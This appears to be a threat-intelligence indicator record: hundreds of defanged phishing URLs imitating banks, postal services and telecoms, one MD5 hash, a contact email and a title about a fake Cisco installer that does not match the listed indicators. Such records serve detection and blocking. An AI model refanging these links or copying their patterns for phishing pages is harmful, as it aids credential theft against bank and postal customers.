url: http://kao[.]jfk[.]mybluehost[.]me/wp-admin/web, http://laelenasa[.]com[.]ar/auqanta/web, http://tly[.]vgj[.]mybluehost[.]me/cgi-bin/web, http://zppwpailkq[.]cfolks[.]pl/ar/web/login[.]php, http://didc-malls[.]net/nk1/de/delogin/66f9272999098-70971[.]php, http://redeem[.]quantasgift[.]store/v2/web, http://gth[.]srl[.]mybluehost[.]me/wp-content/web/bill[.]php, http://qantas[.]seawallet[.]pro/aufly/web, http://cggelhs4fvad[.]adigeni[.]ge/eazy/web, http://ryiucndes[.]mypi[.]co/T/il/index[.]php, http://of-cyprusgroup[.]com/cy/auth/login[.]php, http://profiles[.]riders[.]guide/js/web, http://wordpress-983281-3799665[.]cloudwaysapps[.]com/wpadmin/ca/auth/entrar[.]php, http://0rc5zd5pdqbnlrkv5[.]adigeni[.]ge/eazy/web, http://complete-card-tdn9g8zr3dqc[.]adigeni[.]ge/ccb/web, http://lna[.]ire[.]mybluehost[.]me/wp-content/web, http://ezv[.]jnk[.]mybluehost[.]me/auth/login[.]php, http://www[.]mobilvodafone[.]com/auth/auth[.]php, http://authentication[.]watchsanda[.]com/auth/login[.]php, http://serwer2255313[.]home[.]pl/finan/finan/auth/login[.]php, http://connect-client[.]serv00[.]net/app/app/login[.]php, http://snize-next[.]com/hy0/de/delogin/66e077efe7cf2-73438[.]php, http://espace-documents-authsecappmovil[.]codeanyapp[.]com/Particuliers/sg/web/wait[.]php, http://united-domainsgub9tvon[.]adigeni[.]ge/ud/web/add[.]php, http://webid[.]netcharge[.]lat/verif/miles-and-morekreditkarte[.]com/web/login[.]php, http://corres[.]live/GtTracking/auth/card[.]php, http://atzqatavtz[.]adigeni[.]ge/wino/web/add[.]php, http://tcuvbwgt8l[.]adigeni[.]ge/wino/web/add[.]php, http://7f6n14eabe[.]adigeni[.]ge/wino/web, http://bbndf7evqc[.]adigeni[.]ge/wino/web/add[.]php, http://qzif5odwmi[.]adigeni[.]ge/wino/web/add[.]php, http://w4hquoo7dg[.]adigeni[.]ge/wino/web/add[.]php, http://dervfpvcvy[.]adigeni[.]ge/ud/web/add[.]php, http://kamakatchi[.]serv00[.]net/NETFLIX/app/app/login[.]php, http://satfera[.]in/build/auth, http://myj[.]pju[.]mybluehost[.]me/web, 
http://clinicafatima[.]com/otp/auth/login[.]php, http://ltswedbank-ab[.]com/auth/login[.]php, http://www[.]post-israel[.]savacrm[.]com/il/index[.]php, http://ecomm-shop[.]org/kn21/page/wp/66c1c28a54602-47939[.]php, http://dash-appserv[.]net/hg0/page/wp/66bd88d6bedde-23358[.]php, http://urn[.]pyw[.]mybluehost[.]me/web, http://pintacaritasmiami[.]com/[.]well-known/-/global/takare/login[.]php, http://casabeachfront[.]in/mainz/auth/entrar[.]php, http://domains[.]bavarianmarketing[.]org/wp//domains/clients/web/add[.]php, http://lucassouzajlle[.]com/mains/auth/entrar[.]php, http://radiosouzahits[.]com[.]br/admin/swf, http://swedbankgroup[.]info/auth/login[.]php, http://onlineswedbank-lt[.]com/auth/login[.]php, http://radionave[.]com/scripts/colorbox/images/ie6, http://sparkteamsupport[.]com/web, http://swedbank-lt[.]online/auth/login[.]php, http://acconnex[.]eu/app/login[.]php, http://imprentacubodigital[.]com[.]ar/hu/auth/login[.]php, http://frezik-art[.]pl/finance/Financer/Pos/auth/login[.]php, http://serwer2043802[.]home[.]pl//biblioteka2018/szablon/Post, http://giermusicclub[.]com[.]ar/lt/auth/login[.]php, http://stanfordheathaccountants[.]co[.]uk/cyprus/auth/login[.]php, http://commerzbank-de-phototan[.]info/cmz[.]de/DEcommerzbanka_edit/DEcommerzbanka_edit/web/login[.]php, http://tfserviceupda[.]wpenginepowered[.]com/tf/de/home/login[.]php, http://ebenezerbandeira[.]com[.]br/cgi-bin/web, http://ci45998[.]tw1[.]ru/caixa/home/entrar[.]php, http://campomaior[.]website[.]radio[.]br/imagens/ico_redes/web/payment, http://cidadejornal[.]website[.]radio[.]br/includes/web/payment, http://nerco[.]es/wpincludes/Text/Diff/Engine/host/auth/login[.]php, http://rockbyes[.]com/de/tf-bank/home/login[.]php, http://radiothethemix[.]com/200/web/bill, http://app-update-service[.]site/wp-content/TF-0199/tfbanks/home/login[.]php, http://heisateam[.]com/ar/servizo/home/loading1[.]php, http://wise-idtransfer[.]napraw-agd[.]pl/valid/web/index[.]php, 
http://wise-transfer[.]napraw-agd[.]pl/suift/web/index[.]php, http://wise-signup[.]witchclean[.]com/web/index[.]php, http://wise-line[.]nilangroup[.]com/lg/web/index[.]php, http://centerpointaddisfurnishedapartment[.]com/yettel[.]hu/auth/login[.]php, http://wiseonline[.]fabsmarketinggroup[.]com/sss/web/index[.]php, http://targoholiscarl1999281292[.]codeanyapp[.]com/identificationauthentification/home/login[.]php, http://sb1[.]724[.]mytemp[.]website/s/auth/login[.]php, http://transwise[.]nilangroup[.]com/verify/web/index[.]php, http://tf-banks[.]online/De/tf-bank/home/login[.]php, http://fpv[.]ths[.]mybluehost[.]me/SPK/Online/spa/home/bic[.]php, http://www[.]brilliantcctvcamera[.]com/spk/sparkasse%20de/spa/home/bic[.]php, http://ckx[.]cna[.]mybluehost[.]me/u[.]p[.]s/app/track[.]php, http://kanonjdid[.]tempurl[.]host/xnallo/web/login[.]php, http://of[.]cyprus[.]centerpointaddisfurnishedapartment[.]com/cyprus/auth/login[.]php, http://highshopu[.]com/kWw3r/pos/auth/login[.]php, http://lizard[.]hu/sa/home/entrar[.]php, http://a2[.]detaynet[.]com/SWISS/auth/login[.]php, http://xqq[.]bof[.]mybluehost[.]me/mphb%202/2023/web/login[.]php, http://xvb[.]zca[.]mybluehost[.]me/sp2/abonne/delogin/6641e4a0b0a76-99562[.]php, http://onlinegatewayunpaidfees[.]com/JFYRTADZ/index[.]php, http://nilangroup[.]com/assets/online/web/index[.]php, http://billsleek[.]in/re0/abonne/delogin/663cc2566f456-49777[.]php, http://xvb[.]zca[.]mybluehost[.]me/sp2/abonne/delogin/663cdc75b4f70-86660[.]php, http://dal4[.]hostclusters[.]com/~pwaprmaze/AKEMZLA/ZAMELZ/SG/web/login[.]php, http://reschedulepackonlineus[.]com/JFYRTADZ/index[.]php, http://cyber_folks[.]schmerztherapieschumann[.]de/c1s2e3rt5y6e-ndd/tonline_beta/web/user[.]php, http://cyber_folks[.]kruzineser[.]org/c1s2e3rt5y6e-ndd/tonline_beta/web/user[.]php, http://cyber_folks[.]scrimbus[.]de//c1s2e3rt5y6e-ndd/tonline_beta/web/user[.]php, http://onlineuspsportalusa[.]com/JFYRTADZ/index[.]php, 
http://drshamimkhan[.]in/config/sparkasse/spa/home/login[.]php, http://bakeforeme[.]corenetwork[.]net/mycouriers/web, http://fordpussetto[.]com[.]ar/sparkassea/sparkasse/spa/home/bic[.]php, http://sidikhsu[.]com/sparkasse/spa/home/bic[.]php, http://wiseonline[.]aykernasbungalov[.]com/wises/web/index[.]php, http://receber-post-correiosrrfd[.]codeanyapp[.]com/SG1/sg/web/login[.]php, http://www[.]southerntennis[.]com/~pamrlr/PP/sg/web/login[.]php, http://dolphin4k[.]com/jw/wises/web/index[.]php, http://musclemeal[.]co[.]in/mll/comp/de, http://web-seb[.]com/web/login[.]php, http://69c[.]6b5[.]mywebsitetransfer[.]com/SWISS/auth/login[.]php, http://postfnccontact[.]de[.]swtest[.]ru/de/secure/auth/login[.]php, http://internetbanking[.]ne-tu[.]eu//libraro/mm/web/login[.]php, http://bar[.]bgd[.]mybluehost[.]me/idr/DEsparkasse/spa/home/login[.]php, http://swissonlinecom[.]com/fa/99/web/login[.]php, http://eti[.]hgn[.]mybluehost[.]me/wpadmin/css/auth/home/login[.]php, http://wordpress-168935-0[.]cloudclusters[.]net/spa/spa/hom/spar/spa/home/bic[.]php, http://www[.]moraesconcreto[.]com/wpadmin/nordddea/auth/login[.]php, http://l75[.]eee[.]mywebsitetransfer[.]com/Nordea/auth/login[.]php, http://themarketersdream[.]com[.]au/auth/login[.]php, http://hostnow[.]co[.]ke/twentytwent/auth/home/login[.]php, http://serwer2397890[.]home[.]pl/imodzeb/PostFinance/Finance/auth/login[.]php, http://ashadeofjade[.]com/sar/home/tarjeta[.]php, http://www[.]hospitalcovadonga[.]com/wpcontent/languages/themes/finance/auth/login[.]php, http://myblog-on8u3ksh23[.]live-website[.]com/wpadmin/A/spa/home/login[.]php, http://www[.]postbank[.]fameseminuevos[.]com/app/loginos[.]php, http://dzempas[.]com/wp-amln[.]php/auth/login[.]php, http://littlelight-baby[.]com/vod/auth/login[.]php, http://signin-postfinanceaccountch[.]sslawoff[.]com/id/auth/login[.]php, http://fastupdate[.]tempurl[.]host/vubs/vubs/web/login[.]php, http://politicsniger[.]com[.]ng/wpcontent/upgrade/auth/login[.]php, 
http://obzoronlinecasino[.]ru/wpadmin/stand/app/logins[.]php, http://sparrow[.]de/sa/home/tarjeta[.]php, http://www[.]edenthub[.]com/Downloads/consor/web/login[.]php, http://rfpiliberia[.]com/Application/DE/consor/web/login[.]php, http://thetrend[.]blog/wp-admin/search/web/login[.]php, http://www[.]turismotierraestella[.]com/fonts/_notes/tf/web/login[.]php, http://vfo[.]hdv[.]mybluehost[.]me/website_e9e0f586/A/tfsf/2023/web/login[.]php, http://postsendungschweiz[.]sviluppo[.]host/paket/global/index[.]php, http://clinicaperezdelolmo[.]com/wpincludes/assets/759821354697201255/auth/651f0b7cc227dcfa4c39a30c159dabf5[.]php, http://serwer1739297[.]home[.]pl/-/blog/fio/fiobanka/auth/login[.]php, http://tareeqalghaith[.]com/bas2024/auth/f8bc37e4d02386531effa2f0382cf809[.]php, http://cd69506[.]tw1[.]ru/PostFinance/auth/login[.]php, http://cznew[.]tempurl[.]host/aji/cz/web/login[.]ph, http://abelza[.]pl/cy/auth/login[.]php, http://everdaysca[.]temp[.]swtest[.]ru/up/spaaa/sparkasse/spa/home/login[.]php, http://melon-soft-hosting[.]com/cy/auth/login[.]php, http://support-contacthmz2[.]codeanyapp[.]com/D/Sparkass/auth/home/login[.]php, http://bol[.]yqp[.]mybluehost[.]me/css/auth/home/login[.]php, http://vdv6y[.]live/D/Spvrkvss/auth/home/login[.]php, http://universal-ferretera[.]com/mvm/auth/login[.]php, http://glenorchyinfocentre[.]co[.]nz/[.]well/3568653000/spa/home/login[.]php, http://swed[.]lietuva[.]conextium[.]com/auth/login[.]php, http://rainlapo[.]com/wpcontent/twentytwentyone/auth/home/login[.]php, http://hpp[.]b7b[.]mywebsitetransfer[.]com/SWISSPASS/auth/login[.]php, http://resultados[.]santaanadedios[.]com/css/auth/home/login[.]php, http://trocken[.]online/twentytwentyone/auth/home/login[.]php, http://adminparoisses42[.]fr/glpi/vendor/htmlawed/htmlawed/sparkasse/auth/home/login[.]php, http://emswidebay[.]com[.]au/rel/res/home/entrar[.]php, http://tadbircard[.]ir/govsa/res/home/tarjeta[.]php, http://bomnegociorural[.]com[.]br/d/home/entrar[.]php, 
http://fio[.]cz[.]k1informatica[.]com[.]br/auth/login[.]php, http://www[.]fio[.]cz[.]yviitv[.]com/auth/login[.]php, http://musclemeal[.]co[.]in/fonts/fb0/akkount/de/index[.]php, http://bubblecard[.]org/bubblecard[.]lk/KJ0/akkount/de/index[.]php, http://lt-coach[.]com/wpcontent/plugins/css/akkount/de/index[.]php, http://capetownew[.]tempurl[.]host/wp-tach/cz/web/login[.]php, http://rootland[.]in/mo0/akkount/de/index[.]php, http://rootland[.]in/wpincludes/Requests/bv1/akkount/de/index[.]php, http://millenium-velegozh[.]ru/news/files/cz/web/login[.]php, http://otpbank[.]cs-group[.]digital/post/auth/login[.]php, http://cec[.]ro[.]fabricebernasconiborzi[.]com/auth/login[.]php, http://lumdevelopmentresearch[.]com/wpcontent/plugins/auth/login[.]php, http://anaika[.]birlanavya63a[.]com/wpincludes/Requests/Cookie/auth/login[.]php, http://fort-client[.]college/consor/web/login[.]php, http://idkontoaktualisieren383266[.]codeanyapp[.]com/tr/home/login[.]php, http://www[.]ljrtrucking[.]com/Configs/PostFinance/auth/login[.]php, http://decorfine[.]com[.]ec//[.]well-known/pki-validation/login, http://posttfiinancelusi[.]com/PostF/auth/login[.]php, http://www[.]postfinance[.]ch/ap/ba/ob/html/finance/home?login, http://shrioswalsamaj[.]com/wpcontent/plugins/eqlfrvxfrz/ve/web/login[.]php, http://aktualisierung-kontoinformationenmarklisy1992160133[.]codeanyapp[.]com/ag/home/login[.]php, http://occasionifissowindtre[.]com/auth/login, http://otpdirekt[.]ro[.]pitruzzellaimpianti[.]it/auth/login[.]php, http://otpdirekt[.]sytes[.]net/otp/auth/login[.]php, http://www[.]santander-kreditkortconsumer[.]grey[.]com[.]pk/[.]f6f1fcaf81183bea5949c9ef837912945, http://kundenservice-ingdirekt-girokontoappmovil[.]codeanyapp[.]com/FR/sg/web/login[.]php, http://secure3-mabanque-bnpparibas[.]fr/auth/login[.]php, http://smartbank-otpbank[.]nobokoli[.]com/auth/login[.]php, http://arrarra[.]sa[.]com/app/login[.]php, http://suryamatrimony[.]in/[.]f6f1fcaf81183bea5949c9ef837912945, 
http://www[.]smartbank-otpbank[.]pieseimp[.]ro/auth/login[.]php, http://atchondabikestore[.]com/wpadmin/maint/web/login[.]php, http://48j[.]e35[.]mywebsitetransfer[.]com/carrefoures/auth/login[.]php, http://areabienesyservicios[.]com/res/res/home/entrar[.]php, http://whitefoxpouch[.]com/a/advancia/sparkasse/spa/home/bic[.]php, http://bundesanzeiger[.]gbclinic[.]com/[.]f6f1fcaf81183bea5949c9ef837912945, http://fomrationa[.]temp[.]swtest[.]ru/kada/spaaa/sparkasse/spa/home/login[.]php, http://regulardane[.]10web[.]site/de/mphb/2023/web/login[.]php, http://billsleek[.]in/ic0/comp/de, http://billsleek[.]in/ip0/de/akk/index[.]php, http://group-ibannk[.]web12010[.]web09[.]berowebspace[.]de/api/auth/login[.]php, http://myblog-mf8zji6ax8[.]livewebsite[.]com/mphb/2023/web/login[.]php, http://www[.]conectandocontumagia[.]com/lifrong/home/index[.]php, http://ibnk-gr-info[.]web12010[.]web09[.]berowebspace[.]de/api/auth/login[.]php, http://secure16-bnpparibas[.]fr/auth/login[.]php, http://ctbctw[.]icepluschap[.]com/tw/ctbcbank_panel/auth/login[.]php, http://secure19-bnpparibas[.]fr/auth/login[.]php, http://secure8-bnpparibas[.]fr/auth/login[.]php, http://servicecarfourassist[.]organiccrap[.]com/V0reER/index[.]php, http://srv204523[.]hostertest[.]ru/b456rt46d/4bre41gd2/xc4v21eczr/web/Login[.]php, http://vub[.]companyonlinecom[.]site/vub/web/login[.]php, http://automotive5[.]sa[.]com/login/app/login[.]php, http://secure213[.]inmotionhosting[.]com/~cocoam6/wpincludes/js/tinymce/plugins/compat3x/css/libra/web/login[.]php, http://nuevolead[.]com/tflogist/web/login[.]php, http://medra[.]sa[.]com/login/app/login[.]php, http://secure17-bnpparibas[.]fr/auth/login[.]php, http://ccmmmm[.]sa[.]com/login/app/login[.]php, http://www[.]indasiaglobal[.]com/-/webd/c/h/blue/11/23/2[.]99/d/e/8z52zee520ee/x854z1z5ze0000e/Sw/de/index[.]php, http://ergstaffingtemps[.]com/wpadmin/SAOPAZZE/home/card[.]php, http://statelinks[.]net/rmb/cxv/auth/login[.]php, 
http://www[.]nd-more-kartenabrechnung[.]de/il/index[.]php, http://buy[.]bigbenespana[.]es/cgi-biin/home/entrar[.]php, http://tourised[.]com/postbankgirokonto24/post1/423565/2455/de/user[.]php, http://toursgaudi[.]com/zahlung/home/index[.]php, http://billsleek[.]in/cd1/akkount/de/index[.]php, http://billsleek[.]in/ar0/st/arr/login[.]php, http://bnkgroup-gr[.]dorian[.]hostline[.]net[.]pl/api/auth/login[.]php, http://iaiqh[.]ac[.]id/auth/login[.]php, http://inndesage[.]org/mrd/fnbvics/mp33rd/auth/login[.]php, http://shrey[.]prep[.]co[.]in/auth/login[.]php, http://www[.]nbg[.]group[.]paymentsclaim[.]com/auth/login[.]php, http://afiliados[.]emanuelhallef[.]com[.]br/appcha/home/entrar[.]php, http://atualoja[.]com/zahlung/home/index[.]php, http://lasaath[.]com/Postfinance/home/login[.]php, http://organizacionvip[.]com/zahlung/home/index[.]php, http://tfservvabdofreedy27329072[.]codeanyapp[.]com/mphb/2023/web/login[.]php, http://icaroaph[.]com/liefere/home/index[.]php, http://cristianheredia[.]com/home/index[.]php, http://secure257[.]inmotionhosting[.]com/~dralsafadi/inro/web/login[.]php, http://mivcard[.]com/vieca/home/index[.]php, http://chcfngo[.]in/de/mphb/2023/web/login[.]php, http://mail[.]mindmateapp[.]com/error/israel2k23/il/step2[.]php, http://auth[.]facture-comptable-enligne[.]xyz/auth/login[.]php, http://dsfp5[.]ru[.]com/login/app/login[.]php, http://jsdmadeira[.]pt/home/index[.]php, http://israelbepostcoil[.]it/il/index[.]php, http://simasbos[.]id/assets/font/IKUJYHTGFR/2023/web/login[.]php, http://nenaotransportes[.]srv[.]br/vieca/home/index[.]php, http://gertfb[.]tempurl[.]host/look/web/login[.]php, http://anunciosparaempresas[.]com[.]br/wpcontent/upgrade/tf/web/login[.]php, http://digistore[.]myanmarcafe[.]trade/vieca/home/index[.]php, http://hamam-wellness[.]com/spa/home/card[.]php, http://opdatterinformasjon[.]dynv6[.]net/[.]f6f1fcaf81183bea5949c9ef837912945, http://sfr-annulationesim[.]fr/fr/51043913074cd820fe0fdafa16e77b07[.]php, 
http://alpha[.]parcelvit[.]com/login, http://brookfieldagricultural[.]com[.]au/wpadmin/yuoi/home/card[.]php, http://doutshstg[.]wpenginepowered[.]com/al/home/login[.]php, http://salviano[.]udoit[.]com[.]br/home/index[.]php, http://teamafitness[.]com/wp-admin/ibola/home/card[.]php, http://www[.]seoppcnews[.]com/wpadmin/Sapoer/home/card[.]php, http://www[.]mediamondo[.]com/vieca/-/home/index[.]php, http://ctbcbank-comtaseneh779753577[.]codeanyapp[.]com/cbtc/src/login[.]php, http://smart[.]patrickattema[.]nl/home/index[.]php, http://service-annulation-sfr[.]fr/fr/login[.]php, http://annulation-e-sim-sfr[.]fr/fr/login[.]php, http://ghi[.]billsleek[.]in/fg1/akkount/de/index[.]php, http://app[.]follieeventi[.]it/i/c/auth/login[.]php, http://www[.]tryyourweb[.]com/post/home/index[.]php, http://app[.]fnaemiliaromagna[.]it/ign/cec/auth/login[.]php, http://service-sim-sfr[.]fr/fr/login[.]php, http://ing[.]login-nic-ae[.]com/ign/gr/auth/login[.]php, http://oppdatterkontanktinformasjonn[.]de/[.]f6f1fcaf81183bea5949c9ef837912945, http://tw-postsafiramira099303091[.]codeanyapp[.]com/web/login[.]php, http://meine-tfbank-detaseneh779753577[.]codeanyapp[.]com/web/login[.]php, http://billsleek[.]in/sb3/akkount/de/index[.]php, http://app-153bc257-0381-4ee7-ba06-16f8e40914fc[.]cleverapps[.]io/tar/home/login[.]php, http://boxer[.]vivawebhost[.]com/~sharcoho/udomasa/vendor/brick/math/src/Internal/Calculator/inro/web/login[.]php, http://secure253[.]inmotionhosting[.]com/~belkoc5/wpincludes/js/tinymce/plugins/compat3x/css/inro/web/login[.]php, http://delivery-club-jacobs-millicano-test[.]digitalpreprod[.]ru/dpo/home/index[.]php, http://dev-s-id-check[.]pantheonsite[.]io/spa/home/card[.]php, http://licenselinks[.]com/vieca/home/index[.]php, http://secure4-bnpparibas[.]fr/auth/login[.]php, http://ausfilliing[.]duckdns[.]org/Au/global/index[.]php, http://zahlen-diepost[.]com/global/index[.]php, http://srv199153[.]hostertest[.]ru/n4f6g54h6r5t/b489t4h3f2/web/login[.]php, 
http://swiss-post-ch[.]com/global/index[.]php, http://musclemeal[.]co[.]in/sp06/akkount/de/index[.]php, http://secure2-credit-agricole[.]fr/fr/login[.]php, http://divinepublicschool[.]in/ax04/ax/axa-meine/index[.]php, http://secure3-sfr[.]fr/fr/login[.]php, http://diepost-login[.]com/global/index[.]php, http://article[.]wefre[.]nl/vieca/home/index[.]php, http://www[.]npt-chain[.]com/vieca/home/index[.]php, http://spl-service-sa[.]com/en/bill[.]php, http://usps[.]business/global/index[.]php, http://postal-service[.]co/ch//de/index[.]php, http://www[.]dhf-hilden[.]de/romavbv/web/login[.]php, http://musclemeal[.]co[.]in/ck1/akkount/de/index[.]php, http://www[.]instelatorim10[.]co[.]il/-/home/index[.]php, http://depkhongtuoi[.]com/ch-liefrung/home/index[.]php, http://taxibinhduong247[.]net/wpcontent/languages/seicea/home/index[.]php, http://purehoneyonline[.]com/kon/akkount/de/index[.]php, http://muscleforce[.]in/jprones/akkount/de/index[.]php, http://sonu[.]billsleek[.]in/jqGrid/frk/meine/IDPSTVONSA/index[.]php, http://cindyfernandezstudio[.]com/vieca/home/index[.]php, http://postbankmeinbestsign24h[.]elevadoresvision[.]com[.]br/postde1/423255/de/64AFD9050FBB1[.]php, http://purehoneyonline[.]com/ftx/st-point/clients/login[.]php, http://guciabu[.]com/pt/app/login[.]php, http://n2meinpost24h[.]elevadoresvision[.]com[.]br/postde1/324553/de/64A530E2B872B[.]php, http://die-osteopathin-in-wien[.]at/lvepayd/home/index[.]php, http://activation-cle-digitale-bnp-paribas[.]fr/auth/login[.]php, http://blastdesal[.]com/seices/home/index[.]php, http://hotelcampestrelafloresta[.]com/-/seices/home/index[.]php, http://myalphagr24[.]cursosglaucoleyser[.]com[.]br/alpha1/324344/2344/gr/login[.]php, http://mlsantanderesbanco24h[.]paisrecords[.]com/Qyh9C9b2YDX6g4n/santander24h/X46b9DngQ9Yy2Ch/es/login[.]php, http://todayuupdates[.]tempurl[.]host/tmb/tf/tf/web/login[.]php, http://uwtestserver3[.]nl/home/index[.]php, 
http://www[.]postbankdebest24h[.]biocroche[.]com[.]br/bestsignpostde24h/733dAT6jLAw8fb/b6fd38w37jTALA/de/user[.]php, http://bnpparibas-authentification[.]fr/auth/login[.]php, http://postbankde24hbestsigne[.]robotclub[.]com[.]br/meinbestsigne24/jAwT7b3f6L3dA8/7jAfAdTb63Lw38/de/user[.]php, http://postbankmeinbestsign24h[.]elevadoresvision[.]com[.]br/post1/423545/de/648B0A104BD95[.]php, http://activation-cledigitale-bnpparibas[.]fr/auth/login[.]php, http://bnpparibas-activation-cle-digitale[.]fr/auth/login[.]php, http://postbank1bestsignwinde1[.]connectplus[.]co[.]mz/post1/244543/4314/de/6486DF4479403[.]php, http://bnpparibas-nouvelle-cle-digital[.]fr/auth/login[.]php, http://nouveau-service-bnpparibas[.]fr/auth/login[.]php, http://nouvelle-cle-digitale-bnp-paribas[.]fr/auth/login[.]php, http://nouvelle-cle-digitale-bnpparibas[.]fr/auth/login[.]php, http://andlpostbankbestsigne24h[.]despachantersantos[.]com[.]br/post1/234544/1377/de/6480653EEC279[.]php, http://meinpostbankdebest24h[.]despachantersantos[.]com[.]br/post1/453443/4227/de/6480650BDD441[.]php, http://pixelinegroup[.]com/postde1/203943/2433/de/648036F7977D8[.]php, http://service-clients-sfr[.]fr/fr/login[.]php, http://bnp-paribas-service-clients[.]fr/auth/login[.]php, http://nosservice-bnpparibas[.]fr/auth/login[.]php, http://die-post[.]co/ch/de/index[.]php, http://service-clients-bnp-paribas[.]fr/auth/login[.]php, http://pixelinegroup[.]com/postde1/203943/2433/de/647EFFE0977E0[.]php, http://postbankdebestsigne24h[.]rsantosseguros[.]com[.]br/TA3jd7AwfbL638/TA3jd7AwfbL638/de/647F00642B3E2[.]php, http://postbankdeibest24h[.]despachantersantos[.]com[.]br/post1/245344/3245/de/647F4CEA3686E[.]php, http://demande-esim-sfr[.]fr/fr/login[.]php, http://sfr-demande-e-sim[.]fr/fr/login[.]php, http://conversoresycables[.]com/pb/de/647DB5B0917DB[.]php, http://www[.]postbankdebest24h[.]biocroche[.]com[.]br/postde24h/ATfj33b7dLwA68/6AwLd7b338jfTA/de/user[.]php, http://service-mabanque-bnpparibas[.]fr/auth/login[.]php, 
http://accerpostfinarce[.]photoracertv[.]app/clientes24h/yZ4He8wcWQ764a/home/login[.]php, http://bnpparibas-service-client[.]fr/auth/login[.]php, http://kaya-group[.]eu/wpcontent/plugins/akismet/views/sviezas/home/index[.]php, http://valuecart[.]in/postch1/327892/3799/home/login[.]php, http://varshawires[.]com/postch2/378292/7622/home/login[.]php, http://nos-clients-bnpparibas[.]fr/auth/login[.]php, http://bnpparibas-nos-clients[.]fr/auth/login[.]php, http://kombbansrestaurant[.]com/post1/237888/0488/de/user[.]php, http://royalserenity[.]in/post1/829302/3722/de/user[.]php, http://unitechme[.]com/post1/328903/2987/de/user[.]php, http://rengelinkfonds[.]nl/shppment/home/index[.]php, http://rhscranes[.]com/depost2/289819/2811/de/user[.]php, http://shivaconstructions[.]co/post1/328901/3211/de/user[.]php, http://todayuupdates[.]tempurl[.]host/nikmk/tf/tf/web/login[.]php, http://www[.]monterreydelsur[.]com/post1/329021/3800/de/user[.]php, http://bankingpostbansign23[.]partywebshop[.]com/H2rp32R4eFnk5N/de/user[.]php, http://melnpostdesumzug[.]dtmteam[.]com/enpH42325FkrRN/de/user[.]php, http://comerzbanc[.]tel/lp/login/web/login[.]php, http://rawqha[.]com/commerzbank[.]de/web/login[.]php, http://www[.]commerzbank-loginup[.]multifilium[.]com/web/login[.]php, http://kunden[.]commerzservice[.]eu/web/login[.]php, http://grupopercon[.]com/wp-content/cai/home/entrar[.]php, http://caixadirectaonline[.]cgd-pt[.]tel/cdo/login[.]php, http://assistance-swiss-post[.]info/de/index[.]php, http://miseajour-cledigitale-bnpparibas[.]fr/auth/login[.]php, http://votre-cledigitale-bnpparibas[.]fr/auth/login[.]php, http://sim-sfr-service[.]fr/fr/login[.]php, http://cle-digitale-service-bnpparibas[.]fr/auth/login[.]php, http://bnp-paribas-nouvelle-cle-digitale[.]fr/auth/login[.]php, http://bnpparibas-nouvelle-cle-digitale[.]fr/auth/login[.]php, http://bnp-paribas-service-cle-digitale[.]fr/auth/login[.]php, http://votre-nouvelle-cle-digitalebnpparibas[.]fr/auth/login[.]php, 
http://votre-nouvelle-cledigitalebnpparibas[.]fr/auth/login[.]php, http://service-cledigitale-bnp-paribas[.]fr/auth/login[.]php, http://nouvelle-cledigitale-bnpparibas[.]fr/auth/login[.]php, http://sienahandmadeleatherbags[.]com/homr/hom/app/login[.]php, http://bnpparibas-service-cledigital[.]fr/auth/login[.]php, http://karacarulo[.]com[.]tr/menu/43356NT/app/login[.]php, http://renovvi[.]futuraproduction[.]it/servizipagamento/web/login[.]php, http://servizi[.]futurapress[.]it/servizipagamento/web/login[.]php, http://www[.]bankajk[.]com/rennovi/web/login[.]php, http://arubahosting[.]futurapress[.]it/file/servicehomeit/web/login[.]php, http://delinquenttaxsales[.]com/5235v/app/login[.]php, http://cia[.]4moor[.]it/avvizo/rennnove/web/login[.]php, http://track-posta-romana[.]com/post/confirm[.]php, http://dik[.]lelicriso[.]it/avvizo/rennnove/web/login[.]php, http://applepay-mena[.]com/id/confirm[.]php, http://aza[.]scia-a-roma[.]it/conferma/web/login[.]php, http://des[.]fabbroh24roma[.]it/conferma/web/login[.]php, http://ele[.]sos-elettricistaroma[.]it/conferma/web/login[.]php, http://server[.]bertuzzitravel[.]com/conferma/web/login[.]php, http://apu[.]impresapuliziediamante[.]it/rennovi/web/login[.]php, http://dep[.]autospurgoh24firenze[.]it/rennovi/web/login[.]php, http://www[.]jobsindubai[.]com/sendgrid/N548789564/app/login[.]php, http://perfectway[.]me/wpcontent/plugins/ioptimization/cuenta/home/entrar[.]php, http://www[.]logiroad[.]ci/wpcontent/plugins/apikey/validar/home/entrar[.]php, http://getnew[.]in/admin/controller/extension/extension/app/home/entrar[.]php, http://sportsmansharbor[.]net/tickets/DE548792164/de, http://santander-service[.]com/app/login[.]php, http://www[.]support-access[.]cf/app/login[.]php, http://www[.]supportaccess[.]peachmusicla[.]com/app/login[.]php, http://www[.]bottegafacile[.]it/modules/mod_simplefileupload, http://aspirebuildanddesign[.]com/SA654D94Z6Z4D6/home/entrar[.]php, 
http://yurimagoori[.]com/Z87D94Z64R96EZ546E/home/entrar[.]php, http://faporbaz[.]com/wpcontent/plugins/fecclfkawd/65S46A549846R56/home/entrar[.]php, http://adestrarseupet[.]com[.]br/wpcontent/plugins/biakvnctnl/Q654AD46546546T546R546R/home/entrar[.]php, http://bellydiet[.]com[.]br/A5D8D8T7Y8RE8/home/entrar[.]php, http://elbe[.]co[.]jp/news/wpcontent/plugins/dzjoskqgvj/5S46F56G5G4/home/entrar[.]php, http://bnpparibasconnexion[.]fr/app/id[.]php, http://cloud[.]physik-patio13[.]de/validar/home/entrar[.]php, http://kaqcnadqbo[.]cfolks[.]pl/65A6498R46T546/home/entrar[.]php, http://req-cap01w[.]net/auth/signin[.]php, http://pycwckviqz[.]cfolks[.]pl/654654R4TY44Y/home/entrar[.]php, http://www[.]watch-support[.]cf/app/login[.]php, http://www[.]watchsupport[.]starpizzapakistan[.]com/app/login[.]php, http://www[.]watch-support[.]ml/app/login[.]php, http://www[.]dessertstory[.]co/depost/de, http://www[.]netflix-esupport[.]ml/app/login[.]php, http://www[.]qatarpost[.]shatta[.]net/ar, http://parturier-avocats[.]fr/wp-content/plugins/alpha/login
hash:
- md5=51043913074cd820fe0fdafa16e77b07
email: tamazpam@yahoo[.]com
Title: University site cloned to evade ad detection distributes fake Cisco installer
